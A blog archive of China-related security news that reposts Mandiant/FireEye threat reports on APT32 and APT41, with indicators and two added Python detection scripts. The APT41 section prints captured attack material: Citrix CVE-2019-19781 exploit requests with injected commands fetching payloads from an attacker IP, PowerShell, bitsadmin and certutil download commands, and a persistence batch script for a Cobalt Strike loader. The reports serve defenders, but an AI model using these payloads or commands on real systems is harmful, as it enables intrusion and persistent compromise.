Category Archives: china

Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks

The Feds have published a Top 25 exploits list, rife with big names like BlueKeep, Zerologon and other notorious security vulnerabilities.

NSA Advisory on Chinese Government Hacking

The NSA released an advisory listing the top twenty-five known vulnerabilities currently being exploited by Chinese nation-state attackers.

This advisory provides Common Vulnerabilities and Exposures (CVEs) known to be recently leveraged, or scanned-for, by Chinese state-sponsored cyber actors to enable successful hacking operations against a multitude of victim networks. Most of the vulnerabilities listed below can be exploited to gain initial access to victim networks using products that are directly accessible from the Internet and act as gateways to internal networks. The majority of the products are either for remote access (T1133) or for external web services (T1190), and should be prioritized for immediate patching.

25 vulnerabilities exploited by Chinese state-sponsored hackers

The US Cybersecurity and Infrastructure Security Agency (CISA) has released a list of 25 vulnerabilities Chinese state-sponsored hackers have been recently scanning for or have exploited in attacks. “Most of the vulnerabilities […] can be exploited to gain initial access to victim networks using products that are directly accessible from the Internet and act as gateways to internal networks. The majority of the products are either for remote access or for external web services, and … More

The post 25 vulnerabilities exploited by Chinese state-sponsored hackers appeared first on Help Net Security.

Your data is not destined for China, assures TikTok’s UK boss

The controversial app’s users are ignoring geopolitical battle over its digital security, says Richard Waterworth

TikTok’s UK chief has strenuously denied the video-sharing app, which Donald Trump has threatened to ban, shares data with China.

Richard Waterworth told the Observer that the UK and European arm of TikTok was growing quickly, despite the “turbulent” geopolitical battle in which the Chinese-born app has found itself.


Cyber Security Roundup for July 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, June 2020.

Australian Prime Minister Scott Morrison announced that a sophisticated nation-state actor is causing increasing havoc by attacking the country's government, corporate institutions and critical infrastructure operators. He said, “We know it is a sophisticated state-based cyber actor because of the scale and nature of the targeting and the tradecraft used". While Morrison didn't name the specific country responsible in his statement, Reuters said its sources confirmed China was the culprit. Political tensions have ramped up between Australia and China in recent months after Australia called for an investigation into China's handling of the COVID-19 pandemic. China then reacted by placing tariffs on Australian exports and banning shipments of beef from Australia.

Why am I leading a UK cybersecurity blog with an Australian cyberattacks story? Well, it is because the UK might well be next in the cross-hairs of China's sophisticated cyber army, after the UK Government's stance on using Huawei in 5G infrastructure significantly soured last month, and also because of the increasing political pressure applied by the UK government on the Chinese government following its introduction of a controversial new security law in Hong Kong.

Increased UK Huawei Tensions in June 2020
While the Australian PM rightly described their nation-state threat actor as sophisticated, the cyberattacks described aren't especially sophisticated. The attackers ran spear-phishing campaigns designed to trick email recipients into clicking a link leading to malicious files or a credential-harvesting page, opening malicious attachments, or granting Office 365 OAuth tokens to the actors. This is the same MO as the cyberattacks orchestrated by the cybercriminal fraternity on a daily basis. The Australian government statement advises organisations to patch their internet-facing devices, including web and email servers, and to use multi-factor authentication. All good advice; in fact, all essential good practice for every organisation to adopt, whatever its threat actor landscape.

Away from the international cyber warfare scene, a coalition led by security companies is urging the UK government to revamp the outdated Computer Misuse Act. The UK's 'anti-hacking' law is 30 years old, written well before the internet took root in our digital society, so it is not really suitable for prosecuting modern cybercriminals; they tend to be prosecuted under financial crime and fraud laws instead. The coalition calling for a change in the law includes NCC Group, F-Secure, techUK, McAfee and Trend Micro. They argue that section 1 of the Act, which prohibits unauthorised access to any programme or data held in any computer, has not kept pace with advances in technology. In their letter to the PM they said, "With the advent of modern threat intelligence research, defensive cyber activities often involve the scanning and interrogation of compromised victims' and criminals' systems to lessen the impact of attacks and prevent future incidents. In these cases, criminals are obviously very unlikely to explicitly authorise such access."

Since launching a 'Suspicious Email Reporting Service' in April 2020, the UK National Cyber Security Centre (NCSC) announced it has now received one million reports, receiving around 16,500 emails a day. NCSC Chief Executive Officer Ciaran Martin called the number of reports a “milestone” and “a testament to the vigilance of the British public". I think the email reporting service is another fantastic free service provided by NCSC (i.e. UK Gov) to UK citizens, so one thing the UK government is definitely getting right in the cybersecurity space at the moment.

Zoom announced it will extend 'optional' end-to-end encryption (E2EE) to free users. It is not certain when exactly Zoom's free E2EE will commence or whether it will be on by default, given the Zoom CEO said, “We plan to begin early beta of the E2EE feature in July 2020.” Still, it is good to see the much-criticised (on security grounds) Zoom continuing to bolster its security, including by appointing a seasoned Chief Information Security Officer from Salesforce.

Some men just want to watch the world burn...
With the recent uptick in ransomware, phishing, unsecured cloud buckets and massive data breaches dominating the media headlines over the past couple of years, you could be forgiven for forgetting about the threat posed by Distributed Denial-of-Service (DDoS) attacks. So then, a timely reminder that some threat actors have vast botnets at their disposal for orchestrating huge DDoS attacks, after Amazon reported thwarting the biggest ever DDoS attack (by bandwidth) and a European bank suffered the biggest ever DDoS attack by packets per second. The motives behind these colossal DDoS attacks are unclear; I guess some men just want to watch the world burn.
Quote from Batman butler Alfred (Michael Caine), The Dark Knight

    Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage

    From at least January to April 2020, suspected Vietnamese actors APT32 carried out intrusion campaigns against Chinese targets that Mandiant Threat Intelligence believes were designed to collect intelligence on the COVID-19 crisis. Spear-phishing messages were sent by the actor to China's Ministry of Emergency Management and to the government of Wuhan, the city in Hubei province where COVID-19 was first identified. While targeting of East Asia is consistent with the activity we’ve previously reported on APT32, this incident, and other publicly reported intrusions, are part of a global increase in cyber espionage related to the crisis, carried out by states desperately seeking solutions and non-public information.

    Phishing Emails with Tracking Links Target Chinese Government

    The first known instance of this campaign was on Jan. 6, 2020, when APT32 sent an email with an embedded tracking link (Figure 1) to China's Ministry of Emergency Management using the sender address lijianxiang1870@163[.]com and the subject 第一期办公设备招标结果报告 (translation: Report on the results of the first round of office equipment tenders). The embedded link contained the victim's email address and code to report back to the actors if the email was opened.


    Figure 1: Phishing email to China's Ministry of Emergency Management

    Mandiant Threat Intelligence uncovered additional tracking URLs that revealed targets in China's Wuhan government and an email account also associated with the Ministry of Emergency Management.

    • libjs.inquirerjs[.]com/script/<VICTIM>@wuhan.gov.cn.png
    • libjs.inquirerjs[.]com/script/<VICTIM>@chinasafety.gov.cn.png
    • m.topiccore[.]com/script/<VICTIM>@chinasafety.gov.cn.png
    • m.topiccore[.]com/script/<VICTIM>@wuhan.gov.cn.png
    • libjs.inquirerjs[.]com/script/<VICTIM>@126.com.png

    The libjs.inquirerjs[.]com domain was used in December as a command and control domain for a METALJACK phishing campaign likely targeting Southeast Asian countries.
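    The tracking links above embed the recipient's address in the "image" name, which makes them easy to hunt for in outbound web proxy logs. The following is an added example (not Mandiant's code): it walks constructed proxy lines, matches the post's indicator domains, extracts the targeted address from any /script/<email>.png request, and records any other contact with the listed infrastructure. The proxy line format and the sample entries are assumptions made for this demo, not real telemetry.

```python
"""Hunt for APT32-style email-open tracking links in web proxy logs.

Added example, not code from the Mandiant post. Each constructed log line
has the form "<timestamp> <client_ip> <method> <url>" (an assumed format).
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Domains from the post's indicator list, written un-defanged for matching.
IOC_DOMAINS = {
    "libjs.inquirerjs.com",
    "m.topiccore.com",
    "jcdn.jsoid.com",
    "vitlescaux.com",
}

# The post's tracking URLs put the recipient address in the image name:
#   /script/<VICTIM>@wuhan.gov.cn.png
TRACKING_PATH = re.compile(r"^/script/(?P<email>[^/\s]+@[^/\s]+)\.png$")

# Constructed sample lines (not real telemetry).
SAMPLE_PROXY_LOG = """\
2020-01-06T09:12:44Z 10.10.3.21 GET http://libjs.inquirerjs.com/script/zhangsan@chinasafety.gov.cn.png
2020-01-06T09:12:45Z 10.10.3.21 GET http://cdn.example.com/static/logo.png
2020-01-07T14:02:10Z 10.10.8.7 GET http://m.topiccore.com/script/lisi@wuhan.gov.cn.png
2020-01-07T14:05:00Z 10.10.8.7 GET https://vitlescaux.com/api/v1/poll
2020-01-08T08:00:00Z 10.10.3.21 GET http://m.topiccore.com/script/zhangsan@chinasafety.gov.cn.png
"""


def parse_line(line):
    """Split one constructed proxy line into its four fields."""
    ts, client, method, url = line.split(maxsplit=3)
    return {"ts": ts, "client": client, "method": method, "url": url}


def classify(event):
    """Return ('tracking', email), ('ioc_domain', host) or None."""
    parsed = urlparse(event["url"])
    host = parsed.hostname or ""
    m = TRACKING_PATH.match(parsed.path)
    if m and host in IOC_DOMAINS:
        return ("tracking", m.group("email"))
    if host in IOC_DOMAINS:
        # Any other contact with listed infrastructure (e.g. the C2 domain).
        return ("ioc_domain", host)
    return None


def hunt(log_text):
    """Return ({email: [client ips that opened the lure]}, [other IOC hits])."""
    opened = defaultdict(list)
    other = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        verdict = classify(event)
        if verdict is None:
            continue
        kind, value = verdict
        if kind == "tracking":
            opened[value].append(event["client"])
        else:
            other.append((event["ts"], event["client"], value))
    return dict(opened), other


if __name__ == "__main__":
    opened_by, other_hits = hunt(SAMPLE_PROXY_LOG)
    for email, clients in opened_by.items():
        print(f"lure opened by {email} from {sorted(set(clients))}")
    for hit in other_hits:
        print("other IOC contact:", hit)
```

    The tracking hit tells you which mailbox received and opened the lure, so the same run doubles as a list of accounts to pull the original message from; the non-tracking hits on the same domains are the hosts to check for the METALJACK loader.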

    Additional METALJACK Activity Suggests Campaigns Targeting Mandarin Speakers Interested in COVID-19

    APT32 likely used COVID-19-themed malicious attachments against Chinese-speaking targets. While we have not uncovered the full execution chain, we found a METALJACK loader that displays a Chinese-language COVID-19 decoy document while launching its payload.

    When the METALJACK loader, krpt.dll (MD5: d739f10933c11bd6bd9677f91893986c) is loaded, the export "_force_link_krpt" is likely called. The loader executes one of its embedded resources, a COVID-themed RTF file, displaying the content to the victim and saving the document to %TEMP%.

    The decoy document (Figure 2) titled 冠状病毒实时更新:中国正在追踪来自湖北的旅行者, MD5: c5b98b77810c5619d20b71791b820529 (Translation: COVID-19 live updates: China is currently tracking all travelers coming from Hubei Province) displays a copy of a New York Times article to the victim.


    Figure 2: COVID-themed decoy document

    The malware also loads shellcode in an additional resource, MD5: a4808a329b071a1a37b8d03b1305b0cb, which contains the METALJACK payload. The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com. It then attempts to call out to the URL. If the callout is successful, the malware loads the METALJACK payload into memory.

    It then uses vitlescaux[.]com for command and control.

    Outlook

    The COVID-19 crisis poses an intense, existential concern to governments, and the current air of distrust is amplifying uncertainties, encouraging intelligence collection on a scale that rivals armed conflict. National, state or provincial, and local governments, as well as non-government organizations and international organizations, are being targeted, as seen in reports. Medical research has been targeted as well, according to public statements by a Deputy Assistant Director of the FBI. Until this crisis ends, we anticipate related cyber espionage will continue to intensify globally.

    Indicators

    Domains:        m.topiccore[.]com
                    jcdn.jsoid[.]com
                    libjs.inquirerjs[.]com
                    vitlescaux[.]com
    Email address:  lijianxiang1870@163[.]com
    Files:          d739f10933c11bd6bd9677f91893986c (MD5)  METALJACK loader
                    a4808a329b071a1a37b8d03b1305b0cb (MD5)  METALJACK payload
                    c5b98b77810c5619d20b71791b820529 (MD5)  Decoy document (not malicious)

    Detecting the Techniques

    Platform            Signature Name
    Endpoint Security   Generic.mg.d739f10933c11bd6
    Network Security    Trojan.Apost.FEC2, Trojan.Apost.FEC3, fe_ml_heuristic
    Email Security      Trojan.Apost.FEC2, Trojan.Apost.FEC3, fe_ml_heuristic
    Helix

    Mandiant Security Validation Actions

    • A150-096 - Malicious File Transfer - APT32, METALJACK, Download
    • A150-119 - Protected Theater - APT32, METALJACK Execution
    • A150-104 - Phishing Email - Malicious Attachment, APT32, Contact Information Lure

    MITRE ATT&CK Technique Mapping

    Tactic               Techniques
    Initial Access       Spearphishing Attachment (T1193), Spearphishing Link (T1192)
    Execution            Regsvr32 (T1117), User Execution (T1204)
    Defense Evasion      Regsvr32 (T1117)
    Command and Control  Standard Cryptographic Protocol (T1032), Custom Command and Control Protocol (T1094)

    This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits

    Beginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.

    Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

    Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with CVE-2019-19781 (published December 17, 2019).


    Figure 1: Timeline of key events

    The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.  

    One interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.

    POST /vpns/portal/scripts/newbm.pl HTTP/1.1
    Host: [redacted]
    Connection: close
    Accept-Encoding: gzip, deflate
    Accept: */*
    User-Agent: python-requests/2.22.0
    NSC_NONCE: nsroot
    NSC_USER: ../../../netscaler/portal/templates/[redacted]
    Content-Length: 96

    url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]

    Figure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781

    There is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity pattern by Chinese APT groups in past years as well.

    Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).

    POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
    Accept-Encoding: identity
    Content-Length: 147
    Connection: close
    Nsc_User: ../../../netscaler/portal/templates/[redacted]
    User-Agent: Python-urllib/2.7
    Nsc_Nonce: nsroot
    Host: [redacted]
    Content-Type: application/x-www-form-urlencoded

    url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]

    Figure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781

    We did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, where only the name of the payload ‘un’ changed.

    POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
    Accept-Encoding: identity
    Content-Length: 145
    Connection: close
    Nsc_User: ../../../netscaler/portal/templates/[redacted]
    User-Agent: Python-urllib/2.7
    Nsc_Nonce: nsroot
    Host: [redacted]
    Content-Type: application/x-www-form-urlencoded

    url=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]

    Figure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781

    Citrix released a mitigation for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.

    Cisco Router Exploitation

    On February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that chains two CVEs (CVE-2019-1653 and CVE-2019-1652) to achieve remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload.

    GET /test/fuc HTTP/1.1
    Host: 66.42.98[.]220
    User-Agent: Wget
    Connection: close

    Figure 5: Example HTTP request showing a Cisco RV320 router downloading a payload via wget

    66.42.98[.]220 also hosted a file at http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, the command one would execute on a Cisco RV320 router to display the current configuration.

    Cisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:

    Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

    On March 5, 2020, researcher Steven Seeley published an advisory and proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java-based program containing a set of commands that use PowerShell to download and execute install.bat and storesyncsvc.dll.

    java/lang/Runtime
    getRuntime
    ()Ljava/lang/Runtime;
    Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
    '(Ljava/lang/String;)Ljava/lang/Process;
    StackMapTable
    ysoserial/Pwner76328858520609
    Lysoserial/Pwner76328858520609;

    Figure 6: Strings from the Java class inside logger.zip

    Here we see a toolmark from ysoserial, the tool used to create the payload in the PoC. The string Pwner76328858520609 is unique to the PoC payload, indicating that APT41 likely used the PoC as source material in their operation.

    In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.

    Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe

    Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat

    Figure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation

    In both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).

    @echo off
    set "WORK_DIR=C:\Windows\System32"
    set "DLL_NAME=storesyncsvc.dll"
    set "SERVICE_NAME=StorSyncSvc"
    set "DISPLAY_NAME=Storage Sync Service"
    set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."
    sc stop %SERVICE_NAME%
    sc delete %SERVICE_NAME%
    mkdir %WORK_DIR%
    copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f
    sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"
    SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000
    sc description "%SERVICE_NAME%" "%DESCRIPTION%"
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f
    net start "%SERVICE_NAME%"

    Figure 8: Contents of install.bat (reproduced as found, including the misspelling "collectly")

    Storesyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.

    GET /jquery-3.3.1.min.js HTTP/1.1
    Host: cdn.bootcss.com
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Referer: http://cdn.bootcss.com/
    Accept-Encoding: gzip, deflate
    Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM
    DA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive Cache-Control: no-cache

    Figure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request

    Within a few hours of initial exploitation, APT41 used the storesyncsvc.dll BEACON backdoor to fetch a secondary backdoor with a different C2 address. The download was done with Microsoft CertUtil, a common TTP that we’ve observed APT41 use in past intrusions, and retrieved 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to fetch Cobalt Strike BEACON shellcode. The use of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions to delay analysis of the other tools in their toolkit.

    GET /2.exe HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.3
    Host: 91.208.184[.]78

    Figure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil

    certutil  -urlcache -split -f http://91.208.184[.]78/2.exe

    Figure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader

    The Meterpreter downloader 2.exe was configured to communicate with 91.208.184[.]78 over port 443 and retrieve ‘TzGG’, the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial version).

    GET /TzGG HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
    Host: 91.208.184[.]78:443
    Connection: Keep-Alive
    Cache-Control: no-cache

    Figure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON

    The downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.

    ManageEngine released a short term mitigation for CVE-2020-10189 on January 20, 2020, and subsequently released an update on March 7, 2020, with a long term fix.

    Outlook

    This activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41.

    It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.

    Previously, FireEye Mandiant Managed Defense observed APT41 successfully leveraging CVE-2019-3396 (Atlassian Confluence) against a U.S.-based university. While APT41 is a unique state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.

    Indicators

    CVE-2019-19781 exploitation (Citrix Application Delivery Controller)
    • 66.42.98[.]220
    • CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’
    • CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’
    • CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’
    • /tmp/bsd
    • /tmp/un

    Cisco router exploitation
    • 66.42.98[.]220
    • ‘1.txt’ (MD5: c0c467c8e9b2046d7053642cc9bdd57d)
    • ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc)

    CVE-2020-10189 (Zoho ManageEngine Desktop Central)
    • 66.42.98[.]220
    • 91.208.184[.]78
    • 74.82.201[.]8
    • exchange.dumb1[.]com
    • install.bat (MD5: 7966c2c546b71e800397a67f942858d0)
    • storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)
    • C:\Windows\Temp\storesyncsvc.dll
    • C:\Windows\Temp\install.bat
    • 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)
    • C:\Users\[redacted]\install.bat
    • TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)
    • C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe
    • Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78
    • PowerShell downloading files with Net.WebClient
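    The last three indicators above are behavioural rather than atomic, and they chain with the install.bat persistence in Figure 8: ManageEngine's java.exe spawning a shell, BITSAdmin or CertUtil or PowerShell's Net.WebClient pulling a file, then sc create with an svchost.exe -k host and a ServiceDll registration. The following is an added example (not FireEye's detection content) that scores process-creation events against exactly those behaviours. The event tuples are constructed for the demo, with the page's command lines un-defanged; the java.exe rule is widened beyond the page's cmd.exe/bitsadmin.exe children to include powershell.exe, since Figure 6 shows cmd /c powershell as the child chain.

```python
"""Flag process-creation events matching the APT41 post-exploitation chain.

Added example, not FireEye detection content. Events are constructed for the
demo as (parent_image, image, command_line); map your EDR/Sysmon fields
onto that shape.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Parent path from the page's indicator list (compared case-insensitively).
ZOHO_JAVA = r"\manageengine\desktopcentral_server\jre\bin\java.exe"
# Children the page shows under that java.exe, plus powershell.exe (assumption).
LOLBIN_CHILDREN = ("cmd.exe", "bitsadmin.exe", "powershell.exe")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def zoho_java_spawn(ev):
    """ManageEngine's bundled JRE spawning a shell or downloader LOLBin."""
    return ev.parent_image.lower().endswith(ZOHO_JAVA) and _basename(ev.image) in LOLBIN_CHILDREN


def _cmdline(pattern):
    rx = re.compile(pattern, re.I)
    return lambda ev: rx.search(ev.command_line) is not None


RULES = [
    ("zoho_java_spawn", zoho_java_spawn),
    ("bitsadmin_download", _cmdline(r"bitsadmin(\.exe)?\s+/transfer\b.*https?://")),
    ("certutil_download", _cmdline(r"certutil(\.exe)?\s+.*-urlcache\b.*-f\s+https?://")),
    ("powershell_webclient", _cmdline(r"net\.webclient.*downloadfile")),
    ("svchost_service_install", _cmdline(r"\bsc(\.exe)?\s+create\b.*svchost\.exe\s+-k\b")),
    ("servicedll_registration", _cmdline(r"\breg(\.exe)?\s+add\b.*\\Parameters.*\bServiceDll\b")),
]


def detect(events):
    """Return one finding per event that trips at least one rule."""
    findings = []
    for idx, ev in enumerate(events):
        hits = [name for name, fn in RULES if fn(ev)]
        if hits:
            findings.append({"index": idx, "image": _basename(ev.image), "rules": hits})
    return findings


# Constructed events: the first five mirror the page's figures, the last two are benign noise.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\Users\Public\install.bat"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil  -urlcache -split -f http://91.208.184.78/2.exe"),
    ProcEvent(r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\sc.exe",
              r'sc create "StorSyncSvc" binPath= "C:\Windows\system32\svchost.exe -k StorSyncSvc" type= share start= auto error= ignore'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r'reg add "HKLM\SYSTEM\CurrentControlSet\Services\StorSyncSvc\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "C:\Windows\System32\storesyncsvc.dll" /f'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\certutil.exe", r"certutil -verify cert.cer"),
    ProcEvent(r"C:\Program Files\Java\jre\bin\java.exe", r"C:\Windows\System32\cmd.exe", r"cmd /c ver"),
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

    Two of the rules are worth keeping even after the Zoho patch is applied: the svchost.exe -k service creation paired with a ServiceDll registration is generic persistence tradecraft, and the parent-child pairing for the ManageEngine JRE catches any future RCE in the product, not just CVE-2020-10189.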

    Detecting the Techniques

